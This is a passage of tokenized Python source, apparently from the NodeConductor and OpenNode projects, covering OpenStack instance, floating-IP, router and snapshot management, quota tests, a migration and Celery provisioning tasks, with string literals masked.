service_project_link . floating_ips . create ( <EOL> status = '<STR_LIT>' , <EOL> address = ip_address [ '<STR_LIT>' ] , <EOL> backend_id = ip_address [ '<STR_LIT:id>' ] , <EOL> backend_network_id = ip_address [ '<STR_LIT>' ] <EOL> ) <EOL> def assign_floating_ip_to_instance ( self , instance , floating_ip ) : <EOL> nova = self . nova_admin_client <EOL> nova . servers . add_floating_ip ( server = instance . backend_id , address = floating_ip . address ) <EOL> floating_ip . status = '<STR_LIT>' <EOL> floating_ip . save ( ) <EOL> instance . external_ips = floating_ip . address <EOL> instance . save ( ) <EOL> logger . info ( '<STR_LIT>' , <EOL> floating_ip . address , instance . uuid ) <EOL> def push_floating_ip_to_instance ( self , instance , server ) : <EOL> if not instance . external_ips or not instance . internal_ips : <EOL> return <EOL> logger . debug ( '<STR_LIT>' , <EOL> instance . external_ips , instance . uuid ) <EOL> service_project_link = instance . service_project_link <EOL> try : <EOL> floating_ip = service_project_link . floating_ips . get ( <EOL> status__in = ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> address = instance . external_ips , <EOL> backend_network_id = service_project_link . external_network_id <EOL> ) <EOL> server . add_floating_ip ( address = instance . external_ips , fixed_address = instance . internal_ips ) <EOL> except ( <EOL> nova_exceptions . ClientException , <EOL> ObjectDoesNotExist , <EOL> MultipleObjectsReturned , <EOL> KeyError , <EOL> IndexError , <EOL> ) : <EOL> logger . exception ( '<STR_LIT>' , <EOL> instance . external_ips , instance . uuid ) <EOL> instance . set_erred ( ) <EOL> instance . error_message = '<STR_LIT>' % ( instance . external_ips , <EOL> instance . uuid ) <EOL> instance . save ( ) <EOL> else : <EOL> floating_ip . status = '<STR_LIT>' <EOL> floating_ip . save ( ) <EOL> logger . info ( '<STR_LIT>' , <EOL> instance . external_ips , instance . 
uuid ) <EOL> def connect_tenant_to_external_network ( self , tenant , external_network_id ) : <EOL> neutron = self . neutron_admin_client <EOL> logger . debug ( '<STR_LIT>' , tenant . name , tenant . pk ) <EOL> try : <EOL> response = neutron . show_network ( external_network_id ) <EOL> except neutron_exceptions . NeutronClientException as e : <EOL> logger . exception ( '<STR_LIT>' , external_network_id ) <EOL> six . reraise ( OpenStackBackendError , e ) <EOL> network_name = response [ '<STR_LIT>' ] [ '<STR_LIT:name>' ] <EOL> subnet_id = response [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> self . get_or_create_router ( network_name , subnet_id , <EOL> external = True , network_id = response [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] ) <EOL> tenant . external_network_id = external_network_id <EOL> tenant . save ( ) <EOL> logger . info ( '<STR_LIT>' , <EOL> external_network_id , tenant . backend_id ) <EOL> return external_network_id <EOL> def get_or_create_router ( self , network_name , subnet_id , external = False , network_id = None ) : <EOL> neutron = self . neutron_admin_client <EOL> tenant_id = self . tenant_id <EOL> router_name = '<STR_LIT>' . format ( network_name ) <EOL> routers = neutron . list_routers ( tenant_id = tenant_id ) [ '<STR_LIT>' ] <EOL> if routers : <EOL> logger . info ( '<STR_LIT>' , tenant_id ) <EOL> router = routers [ <NUM_LIT:0> ] <EOL> else : <EOL> router = neutron . create_router ( { '<STR_LIT>' : { '<STR_LIT:name>' : router_name , '<STR_LIT>' : tenant_id } } ) [ '<STR_LIT>' ] <EOL> logger . info ( '<STR_LIT>' , router [ '<STR_LIT:name>' ] ) <EOL> try : <EOL> if not external : <EOL> ports = neutron . list_ports ( device_id = router [ '<STR_LIT:id>' ] , tenant_id = tenant_id ) [ '<STR_LIT>' ] <EOL> if not ports : <EOL> neutron . add_interface_router ( router [ '<STR_LIT:id>' ] , { '<STR_LIT>' : subnet_id } ) <EOL> logger . info ( '<STR_LIT>' , subnet_id , router_name ) <EOL> else : <EOL> logger . 
info ( '<STR_LIT>' , subnet_id , router_name ) <EOL> else : <EOL> if ( not router . get ( '<STR_LIT>' ) or <EOL> router [ '<STR_LIT>' ] . get ( '<STR_LIT>' ) != network_id ) : <EOL> neutron . add_gateway_router ( router [ '<STR_LIT:id>' ] , { '<STR_LIT>' : network_id } ) <EOL> logger . info ( '<STR_LIT>' , network_id , router_name ) <EOL> else : <EOL> logger . info ( '<STR_LIT>' , network_id , router_name ) <EOL> except neutron_exceptions . NeutronClientException as e : <EOL> logger . warning ( e ) <EOL> return router [ '<STR_LIT:id>' ] <EOL> def start_instance ( self , instance ) : <EOL> nova = self . nova_client <EOL> logger . debug ( '<STR_LIT>' , instance . uuid ) <EOL> try : <EOL> backend_instance = nova . servers . find ( id = instance . backend_id ) <EOL> backend_instance_state = self . _get_instance_state ( backend_instance ) <EOL> if backend_instance_state == models . Instance . States . ONLINE : <EOL> logger . warning ( '<STR_LIT>' , instance . uuid ) <EOL> return <EOL> nova . servers . start ( instance . backend_id ) <EOL> if not self . _wait_for_instance_status ( instance . backend_id , nova , '<STR_LIT>' ) : <EOL> logger . error ( '<STR_LIT>' , instance . uuid ) <EOL> raise OpenStackBackendError ( '<STR_LIT>' % instance . uuid ) <EOL> except nova_exceptions . ClientException as e : <EOL> logger . exception ( '<STR_LIT>' , instance . uuid ) <EOL> six . reraise ( OpenStackBackendError , e ) <EOL> else : <EOL> logger . info ( '<STR_LIT>' , instance . uuid ) <EOL> def stop_instance ( self , instance ) : <EOL> nova = self . nova_client <EOL> logger . debug ( '<STR_LIT>' , instance . uuid ) <EOL> try : <EOL> backend_instance = nova . servers . find ( id = instance . backend_id ) <EOL> backend_instance_state = self . _get_instance_state ( backend_instance ) <EOL> if backend_instance_state == models . Instance . States . OFFLINE : <EOL> logger . warning ( '<STR_LIT>' , instance . uuid ) <EOL> return <EOL> nova . servers . stop ( instance . 
backend_id ) <EOL> if not self . _wait_for_instance_status ( instance . backend_id , nova , '<STR_LIT>' ) : <EOL> logger . error ( '<STR_LIT>' , instance . uuid ) <EOL> raise OpenStackBackendError ( '<STR_LIT>' % instance . uuid ) <EOL> except nova_exceptions . ClientException as e : <EOL> logger . exception ( '<STR_LIT>' , instance . uuid ) <EOL> six . reraise ( OpenStackBackendError , e ) <EOL> else : <EOL> instance . start_time = None <EOL> instance . save ( update_fields = [ '<STR_LIT>' ] ) <EOL> logger . info ( '<STR_LIT>' , instance . uuid ) <EOL> def restart_instance ( self , instance ) : <EOL> nova = self . nova_client <EOL> logger . debug ( '<STR_LIT>' , instance . uuid ) <EOL> try : <EOL> nova . servers . reboot ( instance . backend_id ) <EOL> if not self . _wait_for_instance_status ( instance . backend_id , nova , '<STR_LIT>' , retries = <NUM_LIT> ) : <EOL> logger . error ( '<STR_LIT>' , instance . uuid ) <EOL> raise OpenStackBackendError ( '<STR_LIT>' % instance . uuid ) <EOL> except nova_exceptions . ClientException as e : <EOL> logger . exception ( '<STR_LIT>' , instance . uuid ) <EOL> six . reraise ( OpenStackBackendError , e ) <EOL> else : <EOL> logger . info ( '<STR_LIT>' , instance . uuid ) <EOL> def delete_instance ( self , instance ) : <EOL> nova = self . nova_client <EOL> logger . info ( '<STR_LIT>' , instance . uuid ) <EOL> try : <EOL> nova . servers . delete ( instance . backend_id ) <EOL> if not self . _wait_for_instance_deletion ( instance . backend_id ) : <EOL> logger . info ( '<STR_LIT>' , instance . uuid ) <EOL> event_logger . resource . error ( <EOL> '<STR_LIT>' , <EOL> event_type = '<STR_LIT>' , <EOL> event_context = { '<STR_LIT>' : instance } ) <EOL> raise OpenStackBackendError ( '<STR_LIT>' % instance . uuid ) <EOL> except nova_exceptions . ClientException as e : <EOL> logger . info ( '<STR_LIT>' , instance . uuid ) <EOL> event_logger . resource . 
error ( <EOL> '<STR_LIT>' , <EOL> event_type = '<STR_LIT>' , <EOL> event_context = { '<STR_LIT>' : instance } ) <EOL> six . reraise ( OpenStackBackendError , e ) <EOL> else : <EOL> logger . info ( '<STR_LIT>' , instance . uuid ) <EOL> event_logger . resource . info ( <EOL> '<STR_LIT>' , <EOL> event_type = '<STR_LIT>' , <EOL> event_context = { '<STR_LIT>' : instance } ) <EOL> if instance . service_project_link . floating_ips . filter ( address = instance . external_ips ) . update ( status = '<STR_LIT>' ) : <EOL> logger . info ( '<STR_LIT>' , <EOL> instance . external_ips , instance . uuid ) <EOL> def create_snapshots ( self , service_project_link , volume_ids , prefix = '<STR_LIT>' ) : <EOL> cinder = self . cinder_client <EOL> logger . debug ( '<STR_LIT>' , '<STR_LIT:U+002CU+0020>' . join ( volume_ids ) ) <EOL> try : <EOL> snapshot_ids = [ ] <EOL> for volume_id in volume_ids : <EOL> snapshot = self . create_snapshot ( volume_id , cinder ) <EOL> service_project_link . add_quota_usage ( '<STR_LIT>' , self . gb2mb ( snapshot . size ) ) <EOL> snapshot_ids . append ( snapshot . id ) <EOL> except ( cinder_exceptions . ClientException , keystone_exceptions . ClientException ) as e : <EOL> logger . exception ( '<STR_LIT>' , '<STR_LIT:U+002CU+0020>' . join ( volume_ids ) ) <EOL> six . reraise ( OpenStackBackendError , e ) <EOL> else : <EOL> logger . info ( '<STR_LIT>' , '<STR_LIT:U+002CU+0020>' . join ( snapshot_ids ) ) <EOL> return snapshot_ids <EOL> def delete_snapshots ( self , service_project_link , snapshot_ids ) : <EOL> cinder = self . cinder_client <EOL> logger . debug ( '<STR_LIT>' , '<STR_LIT:U+002CU+0020>' . join ( snapshot_ids ) ) <EOL> try : <EOL> for snapshot_id in snapshot_ids : <EOL> logger . debug ( '<STR_LIT>' , snapshot_id ) <EOL> size = cinder . volume_snapshots . get ( snapshot_id ) . size <EOL> if not self . 
_wait_for_snapshot_status ( snapshot_id , cinder , '<STR_LIT>' , '<STR_LIT:error>' , poll_interval = <NUM_LIT> , retries = <NUM_LIT:30> ) : <EOL> raise OpenStackBackendError ( '<STR_LIT>' , snapshot_id ) <EOL> cinder . volume_snapshots . delete ( snapshot_id ) <EOL> if self . _wait_for_snapshot_deletion ( snapshot_id , cinder ) : <EOL> service_project_link . add_quota_usage ( '<STR_LIT>' , - self . gb2mb ( size ) ) <EOL> logger . info ( '<STR_LIT>' , snapshot_id ) <EOL> else : <EOL> logger . exception ( '<STR_LIT>' , snapshot_id ) <EOL> except ( cinder_exceptions . ClientException , keystone_exceptions . ClientException ) as e : <EOL> logger . exception ( <EOL> '<STR_LIT>' , '<STR_LIT:U+002CU+0020>' . join ( snapshot_ids ) ) <EOL> six . reraise ( OpenStackBackendError , e ) <EOL> else : <EOL> logger . info ( <EOL> '<STR_LIT>' , '<STR_LIT:U+002CU+0020>' . join ( snapshot_ids ) ) <EOL> def create_volume_from_snapshot ( self , snapshot_id , prefix = '<STR_LIT>' ) : <EOL> cinder = self . cinder_client <EOL> snapshot = cinder . volume_snapshots . get ( snapshot_id ) <EOL> volume_size = snapshot . size <EOL> volume_name = prefix + ( '<STR_LIT>' % snapshot . volume_id ) <EOL> logger . debug ( '<STR_LIT>' , snapshot_id ) <EOL> created_volume = cinder . volumes . create ( volume_size , snapshot_id = snapshot_id , <EOL> display_name = volume_name ) <EOL> volume_id = created_volume . id <EOL> if not self . _wait_for_volume_status ( volume_id , cinder , '<STR_LIT>' , '<STR_LIT:error>' ) : <EOL> raise OpenStackBackendError ( '<STR_LIT>' , snapshot_id ) <EOL> logger . info ( '<STR_LIT>' , <EOL> volume_id , snapshot_id ) <EOL> return volume_id <EOL> def promote_snapshots_to_volumes ( self , service_project_link , snapshot_ids , prefix = '<STR_LIT>' ) : <EOL> cinder = self . cinder_client <EOL> logger . debug ( '<STR_LIT>' , '<STR_LIT:U+002CU+0020>' . 
join ( snapshot_ids ) ) <EOL> try : <EOL> promoted_volume_ids = [ ] <EOL> for snapshot_id in snapshot_ids : <EOL> snapshot = cinder . volume_snapshots . get ( snapshot_id ) <EOL> promoted_volume_id = self . create_volume_from_snapshot ( snapshot_id , prefix = prefix ) <EOL> promoted_volume_ids . append ( promoted_volume_id ) <EOL> service_project_link . add_quota_usage ( '<STR_LIT>' , self . gb2mb ( snapshot . size ) ) <EOL> except ( cinder_exceptions . ClientException , keystone_exceptions . ClientException ) as e : <EOL> logger . exception ( '<STR_LIT>' , '<STR_LIT:U+002CU+0020>' . join ( snapshot_ids ) ) <EOL> six . reraise ( OpenStackBackendError , e ) <EOL> else : <EOL> logger . info ( '<STR_LIT>' , '<STR_LIT:U+002CU+0020>' . join ( promoted_volume_ids ) ) <EOL> return promoted_volume_ids <EOL> @ log_backend_action ( ) <EOL> def update_tenant ( self , tenant ) : <EOL> keystone = self . keystone_admin_client <EOL> try : <EOL> keystone . tenants . update ( tenant . backend_id , name = tenant . name , description = tenant . description ) <EOL> except keystone_exceptions . NotFound as e : <EOL> logger . error ( '<STR_LIT>' , tenant . backend_id ) <EOL> six . reraise ( OpenStackBackendError , e ) <EOL> def create_snapshot ( self , volume_id , cinder ) : <EOL> """<STR_LIT>""" <EOL> snapshot = cinder . volume_snapshots . create ( <EOL> volume_id , force = True , display_name = '<STR_LIT>' % volume_id ) <EOL> logger . debug ( '<STR_LIT>' % snapshot . id ) <EOL> if not self . _wait_for_snapshot_status ( snapshot . id , cinder , '<STR_LIT>' , '<STR_LIT:error>' ) : <EOL> logger . error ( '<STR_LIT>' , volume_id ) <EOL> raise OpenStackBackendError ( ) <EOL> logger . info ( '<STR_LIT>' , snapshot . id , volume_id ) <EOL> return snapshot </s>
<s> from nodeconductor . openstack import views <EOL> def register_in ( router ) : <EOL> router . register ( r'<STR_LIT>' , views . OpenStackServiceViewSet , base_name = '<STR_LIT>' ) <EOL> router . register ( r'<STR_LIT>' , views . ImageViewSet , base_name = '<STR_LIT>' ) <EOL> router . register ( r'<STR_LIT>' , views . FlavorViewSet , base_name = '<STR_LIT>' ) <EOL> router . register ( r'<STR_LIT>' , views . InstanceViewSet , base_name = '<STR_LIT>' ) <EOL> router . register ( r'<STR_LIT>' , views . TenantViewSet , base_name = '<STR_LIT>' ) <EOL> router . register ( r'<STR_LIT>' , views . OpenStackServiceProjectLinkViewSet , base_name = '<STR_LIT>' ) <EOL> router . register ( r'<STR_LIT>' , views . SecurityGroupViewSet , base_name = '<STR_LIT>' ) <EOL> router . register ( r'<STR_LIT>' , views . FloatingIPViewSet , base_name = '<STR_LIT>' ) <EOL> router . register ( r'<STR_LIT>' , views . BackupScheduleViewSet , base_name = '<STR_LIT>' ) <EOL> router . register ( r'<STR_LIT>' , views . BackupViewSet , base_name = '<STR_LIT>' ) <EOL> router . register ( r'<STR_LIT>' , views . LicenseViewSet , base_name = '<STR_LIT>' ) </s>
<s> from django . test import TestCase <EOL> from nodeconductor . quotas import models <EOL> from nodeconductor . structure import models as structure_models <EOL> from nodeconductor . structure . tests import factories as structure_factories <EOL> class GlobalQuotasHandlersTestCase ( TestCase ) : <EOL> def test_project_global_quota_increased_after_project_creation ( self ) : <EOL> quota = models . Quota . objects . get ( name = structure_models . Project . GLOBAL_COUNT_QUOTA_NAME ) <EOL> structure_factories . ProjectFactory ( ) <EOL> reread_quota = models . Quota . objects . get ( pk = quota . pk ) <EOL> self . assertEqual ( reread_quota . usage , quota . usage + <NUM_LIT:1> ) <EOL> def test_project_global_quota_decreased_after_project_deletion ( self ) : <EOL> project = structure_factories . ProjectFactory ( ) <EOL> quota = models . Quota . objects . get ( name = structure_models . Project . GLOBAL_COUNT_QUOTA_NAME ) <EOL> project . delete ( ) <EOL> reread_quota = models . Quota . objects . get ( pk = quota . pk ) <EOL> self . assertEqual ( reread_quota . usage , quota . usage - <NUM_LIT:1> ) </s>
<s> from __future__ import unicode_literals <EOL> from uuid import uuid4 <EOL> from django . db import migrations <EOL> def create_quotas ( apps , schema_editor ) : <EOL> Project = apps . get_model ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> Customer = apps . get_model ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> ProjectGroup = apps . get_model ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> Quota = apps . get_model ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> quota_name_map = { <EOL> Project : '<STR_LIT>' , <EOL> Customer : '<STR_LIT>' , <EOL> ProjectGroup : '<STR_LIT>' , <EOL> } <EOL> for model in [ Project , Customer , ProjectGroup ] : <EOL> name = quota_name_map [ model ] <EOL> usage = model . objects . count ( ) <EOL> if not Quota . objects . filter ( name = name , object_id__isnull = True ) . exists ( ) : <EOL> Quota . objects . create ( uuid = uuid4 ( ) . hex , name = name , usage = usage ) <EOL> else : <EOL> Quota . objects . filter ( name = name , object_id__isnull = True ) . update ( usage = usage ) <EOL> class Migration ( migrations . Migration ) : <EOL> dependencies = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> operations = [ <EOL> migrations . RunPython ( create_quotas ) , <EOL> ] </s>
<s> import factory <EOL> from rest_framework import test , status <EOL> from nodeconductor . openstack . tests . factories import InstanceFactory <EOL> from nodeconductor . structure import SupportedServices <EOL> from nodeconductor . structure . models import CustomerRole , Resource <EOL> from nodeconductor . structure . tests import factories <EOL> class ResourceQuotasTest ( test . APITransactionTestCase ) : <EOL> def setUp ( self ) : <EOL> self . user = factories . UserFactory ( ) <EOL> self . customer = factories . CustomerFactory ( ) <EOL> self . customer . add_user ( self . user , CustomerRole . OWNER ) <EOL> self . project = factories . ProjectFactory ( customer = self . customer ) <EOL> def test_auto_quotas_update ( self ) : <EOL> service_type = '<STR_LIT>' <EOL> models = SupportedServices . get_service_models ( ) [ service_type ] <EOL> settings = factories . ServiceSettingsFactory ( customer = self . customer , type = service_type , shared = False ) <EOL> class ServiceFactory ( factory . DjangoModelFactory ) : <EOL> class Meta ( object ) : <EOL> model = models [ '<STR_LIT>' ] <EOL> class ServiceProjectLinkFactory ( factory . DjangoModelFactory ) : <EOL> class Meta ( object ) : <EOL> model = models [ '<STR_LIT>' ] <EOL> service = ServiceFactory ( customer = self . customer , settings = settings ) <EOL> for resource_model in models [ '<STR_LIT>' ] : <EOL> if not hasattr ( resource_model , '<STR_LIT>' ) : <EOL> continue <EOL> class ResourceFactory ( factory . DjangoModelFactory ) : <EOL> class Meta ( object ) : <EOL> model = resource_model <EOL> data = { '<STR_LIT>' : <NUM_LIT:4> , '<STR_LIT>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT> } <EOL> service_project_link = ServiceProjectLinkFactory ( service = service , project = self . project ) <EOL> resource = ResourceFactory ( service_project_link = service_project_link , cores = data [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( service_project_link . quotas . get ( name = '<STR_LIT>' ) . 
usage , <NUM_LIT:1> ) <EOL> self . assertEqual ( service_project_link . quotas . get ( name = '<STR_LIT>' ) . usage , data [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( service_project_link . quotas . get ( name = '<STR_LIT>' ) . usage , <NUM_LIT:0> ) <EOL> self . assertEqual ( service_project_link . quotas . get ( name = '<STR_LIT>' ) . usage , <NUM_LIT:0> ) <EOL> resource . ram = data [ '<STR_LIT>' ] <EOL> resource . disk = data [ '<STR_LIT>' ] <EOL> resource . save ( ) <EOL> self . assertEqual ( service_project_link . quotas . get ( name = '<STR_LIT>' ) . usage , data [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( service_project_link . quotas . get ( name = '<STR_LIT>' ) . usage , data [ '<STR_LIT>' ] ) <EOL> resource . delete ( ) <EOL> self . assertEqual ( service_project_link . quotas . get ( name = '<STR_LIT>' ) . usage , <NUM_LIT:0> ) <EOL> self . assertEqual ( service_project_link . quotas . get ( name = '<STR_LIT>' ) . usage , <NUM_LIT:0> ) <EOL> self . assertEqual ( service_project_link . quotas . get ( name = '<STR_LIT>' ) . usage , <NUM_LIT:0> ) <EOL> self . assertEqual ( service_project_link . quotas . get ( name = '<STR_LIT>' ) . usage , <NUM_LIT:0> ) <EOL> class ResourceRemovalTest ( test . APITransactionTestCase ) : <EOL> def setUp ( self ) : <EOL> self . user = factories . UserFactory ( is_staff = True ) <EOL> self . client . force_authenticate ( user = self . user ) <EOL> def test_vm_unlinked_immediately_anyway ( self ) : <EOL> vm = InstanceFactory ( state = Resource . States . PROVISIONING_SCHEDULED ) <EOL> url = InstanceFactory . get_url ( vm , '<STR_LIT>' ) <EOL> response = self . client . post ( url ) <EOL> self . assertEqual ( response . status_code , status . HTTP_204_NO_CONTENT , response . data ) <EOL> def test_vm_without_backend_id_removed_immediately ( self ) : <EOL> vm = InstanceFactory ( state = Resource . States . OFFLINE ) <EOL> url = InstanceFactory . get_url ( vm ) <EOL> response = self . client . delete ( url ) <EOL> self . 
assertEqual ( response . status_code , status . HTTP_204_NO_CONTENT , response . data ) <EOL> def test_vm_with_backend_id_scheduled_to_deletion ( self ) : <EOL> vm = InstanceFactory ( state = Resource . States . OFFLINE , backend_id = <NUM_LIT> ) <EOL> url = InstanceFactory . get_url ( vm ) <EOL> response = self . client . delete ( url ) <EOL> self . assertEqual ( response . status_code , status . HTTP_202_ACCEPTED , response . data ) </s>
<s> from celery import shared_task <EOL> from nodeconductor . core . tasks import retry_if_false <EOL> from nodeconductor . structure import SupportedServices <EOL> from nodeconductor . template import models <EOL> @ shared_task <EOL> def schedule_provision ( previous_task_data = None , url = None , template_uuid = None , token_key = None , <EOL> additional_options = None , template_group_result_uuid = None ) : <EOL> template = models . Template . objects . get ( uuid = template_uuid ) <EOL> response_data = template . schedule_provision ( url , token_key , additional_options , previous_task_data ) . json ( ) <EOL> if template_group_result_uuid is not None : <EOL> template_group_result = models . TemplateGroupResult . objects . get ( uuid = template_group_result_uuid ) <EOL> resource_type = SupportedServices . get_name_for_model ( template . object_content_type . model_class ( ) ) <EOL> template_group_result . state_message = '<STR_LIT>' % resource_type <EOL> template_group_result . save ( ) <EOL> return response_data <EOL> @ shared_task ( max_retries = <NUM_LIT> , default_retry_delay = <NUM_LIT:20> ) <EOL> @ retry_if_false <EOL> def wait_for_provision ( previous_task_data = None , template_uuid = None , token_key = None , <EOL> template_group_result_uuid = None , success_states = [ '<STR_LIT>' , '<STR_LIT:OK>' ] , erred_state = '<STR_LIT>' ) : <EOL> template_group_result = models . TemplateGroupResult . objects . get ( uuid = template_group_result_uuid ) <EOL> template = models . Template . objects . get ( uuid = template_uuid ) <EOL> url = previous_task_data [ '<STR_LIT:url>' ] <EOL> resource_data = template . get_resource ( url , token_key ) . json ( ) <EOL> resource_type = SupportedServices . get_name_for_model ( template . object_content_type . model_class ( ) ) <EOL> template_group_result . provisioned_resources [ resource_type ] = url <EOL> template_group_result . 
save ( ) <EOL> state = resource_data [ '<STR_LIT:state>' ] <EOL> if state in success_states : <EOL> template_group_result . state_message = '<STR_LIT>' % resource_type <EOL> template_group_result . save ( ) <EOL> return resource_data <EOL> elif state != erred_state : <EOL> template_group_result . state_message = '<STR_LIT>' % ( resource_type , state ) <EOL> template_group_result . save ( ) <EOL> return False <EOL> else : <EOL> message = '<STR_LIT>' % resource_type <EOL> details = '<STR_LIT>' % ( url , state ) <EOL> raise models . TemplateActionException ( message , details ) <EOL> @ shared_task <EOL> def template_group_execution_succeed ( template_group_result_uuid ) : <EOL> template_group_result = models . TemplateGroupResult . objects . get ( uuid = template_group_result_uuid ) <EOL> template_group_result . state_message = '<STR_LIT>' <EOL> template_group_result . is_finished = True <EOL> template_group_result . save ( ) <EOL> @ shared_task ( bind = True ) <EOL> def template_group_execution_failed ( self , task_uuid , template_group_result_uuid ) : <EOL> task_result = self . app . AsyncResult ( task_uuid ) <EOL> error = models . TemplateActionException . deserialize ( str ( task_result . result ) ) <EOL> template_group_result = models . TemplateGroupResult . objects . get ( uuid = template_group_result_uuid ) <EOL> template_group_result . state_message = '<STR_LIT>' <EOL> template_group_result . error_message = error [ '<STR_LIT:message>' ] <EOL> template_group_result . error_details = error . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> template_group_result . is_finished = True <EOL> template_group_result . is_erred = True <EOL> template_group_result . save ( ) </s>
<s> from contextlib import closing <EOL> from os import path <EOL> from xml . etree import ElementTree as ET <EOL> import libvirt <EOL> import operator <EOL> import os <EOL> import shutil <EOL> import tarfile <EOL> import xml . dom <EOL> from ovf . OvfFile import OvfFile <EOL> from ovf . OvfReferencedFile import OvfReferencedFile <EOL> from opennode . cli . config import get_config <EOL> from opennode . cli . log import get_logger <EOL> from opennode . cli . actions . utils import execute , get_file_size_bytes , calculate_hash , TemplateException <EOL> from opennode . cli . actions . vm import ovfutil <EOL> from opennode . cli . actions import sysresources as sysres <EOL> from opennode . cli . actions . utils import roll_data <EOL> def get_ovf_template_settings ( ovf_file ) : <EOL> """<STR_LIT>""" <EOL> settings = read_default_ovf_settings ( ) <EOL> read_ovf_settings ( settings , ovf_file ) <EOL> return settings <EOL> def get_active_template_settings ( vm_name , storage_pool ) : <EOL> """<STR_LIT>""" <EOL> settings = read_default_ovf_settings ( ) <EOL> kvm_xml_dom = get_libvirt_conf_xml ( vm_name ) <EOL> domain_dom = kvm_xml_dom . getElementsByTagName ( "<STR_LIT>" ) [ <NUM_LIT:0> ] <EOL> interface_list_dom = domain_dom . getElementsByTagName ( "<STR_LIT>" ) <EOL> os_dom = domain_dom . getElementsByTagName ( "<STR_LIT>" ) [ <NUM_LIT:0> ] <EOL> os_type_dom = os_dom . getElementsByTagName ( "<STR_LIT:type>" ) [ <NUM_LIT:0> ] <EOL> os_arch = os_type_dom . getAttribute ( "<STR_LIT>" ) <EOL> settings [ "<STR_LIT>" ] = os_arch <EOL> vcpu_count = domain_dom . getElementsByTagName ( "<STR_LIT>" ) [ <NUM_LIT:0> ] . firstChild . nodeValue <EOL> settings [ "<STR_LIT>" ] = vcpu_count <EOL> settings [ "<STR_LIT>" ] = vcpu_count <EOL> settings [ "<STR_LIT>" ] = vcpu_count <EOL> memory_count = domain_dom . getElementsByTagName ( "<STR_LIT>" ) [ <NUM_LIT:0> ] . firstChild . 
nodeValue <EOL> settings [ "<STR_LIT>" ] = str ( round ( float ( memory_count ) / <NUM_LIT> ** <NUM_LIT:2> , <NUM_LIT:3> ) ) <EOL> settings [ "<STR_LIT>" ] = str ( round ( float ( memory_count ) / <NUM_LIT> ** <NUM_LIT:2> , <NUM_LIT:3> ) ) <EOL> settings [ "<STR_LIT>" ] = str ( round ( float ( memory_count ) / <NUM_LIT> ** <NUM_LIT:2> , <NUM_LIT:3> ) ) <EOL> features_dom_list = domain_dom . getElementsByTagName ( "<STR_LIT>" ) [ <NUM_LIT:0> ] . childNodes <EOL> for feature in features_dom_list : <EOL> if ( feature . nodeType == feature . ELEMENT_NODE ) : <EOL> settings [ "<STR_LIT>" ] . append ( str ( feature . nodeName ) ) <EOL> for interface_dom in interface_list_dom : <EOL> if interface_dom . getAttribute ( "<STR_LIT:type>" ) == "<STR_LIT>" : <EOL> mac_address = interface_dom . getElementsByTagName ( "<STR_LIT>" ) [ <NUM_LIT:0> ] . getAttribute ( "<STR_LIT:address>" ) <EOL> bridge_name = interface_dom . getElementsByTagName ( "<STR_LIT:source>" ) [ <NUM_LIT:0> ] . getAttribute ( "<STR_LIT>" ) <EOL> settings [ "<STR_LIT>" ] . append ( { "<STR_LIT:type>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : bridge_name , <EOL> "<STR_LIT>" : mac_address } ) <EOL> return settings <EOL> def get_libvirt_conf_xml ( vm_name ) : <EOL> conn = libvirt . open ( "<STR_LIT>" ) <EOL> vm = conn . lookupByName ( vm_name ) <EOL> document = xml . dom . minidom . parseString ( vm . XMLDesc ( <NUM_LIT:0> ) ) <EOL> return document <EOL> def read_default_ovf_settings ( ) : <EOL> """<STR_LIT>""" <EOL> config = get_config ( "<STR_LIT>" ) <EOL> settings = { <EOL> "<STR_LIT>" : { "<STR_LIT:type>" : "<STR_LIT>" , "<STR_LIT>" : <NUM_LIT:0> } , <EOL> "<STR_LIT>" : { "<STR_LIT:type>" : "<STR_LIT>" , "<STR_LIT>" : <NUM_LIT:0> } , <EOL> "<STR_LIT>" : { "<STR_LIT:type>" : "<STR_LIT>" , <EOL> "<STR_LIT:port>" : - <NUM_LIT:1> , <EOL> "<STR_LIT>" : "<STR_LIT:yes>" , <EOL> "<STR_LIT>" : config . 
getstring ( "<STR_LIT>" , "<STR_LIT>" ) } , <EOL> "<STR_LIT>" : [ ] , <EOL> "<STR_LIT>" : [ ] , <EOL> "<STR_LIT>" : [ ] <EOL> } <EOL> settings . update ( dict ( config . getlist ( '<STR_LIT>' ) ) ) <EOL> if not os . path . exists ( settings . get ( "<STR_LIT>" , "<STR_LIT>" ) ) : <EOL> settings [ "<STR_LIT>" ] = "<STR_LIT>" <EOL> return settings <EOL> def read_ovf_settings ( settings , ovf_file ) : <EOL> """<STR_LIT>""" <EOL> settings [ "<STR_LIT>" ] = path . splitext ( path . basename ( ovf_file . path ) ) [ <NUM_LIT:0> ] <EOL> sys_type , sys_arch = ovfutil . get_vm_type ( ovf_file ) . split ( "<STR_LIT:->" ) <EOL> if sys_type != "<STR_LIT>" : <EOL> raise TemplateException ( "<STR_LIT>" % sys_type ) <EOL> if sys_arch not in [ "<STR_LIT>" , "<STR_LIT>" ] : <EOL> raise TemplateException ( "<STR_LIT>" % sys_arch ) <EOL> settings [ "<STR_LIT>" ] = sys_arch <EOL> memory_settings = [ <EOL> ( "<STR_LIT>" , ovfutil . get_ovf_min_memory_gb ( ovf_file ) ) , <EOL> ( "<STR_LIT>" , ovfutil . get_ovf_normal_memory_gb ( ovf_file ) ) , <EOL> ( "<STR_LIT>" , ovfutil . get_ovf_max_memory_gb ( ovf_file ) ) ] <EOL> settings . update ( dict ( filter ( operator . itemgetter ( <NUM_LIT:1> ) , memory_settings ) ) ) <EOL> vcpu_settings = [ <EOL> ( "<STR_LIT>" , ovfutil . get_ovf_min_vcpu ( ovf_file ) ) , <EOL> ( "<STR_LIT>" , ovfutil . get_ovf_normal_vcpu ( ovf_file ) ) , <EOL> ( 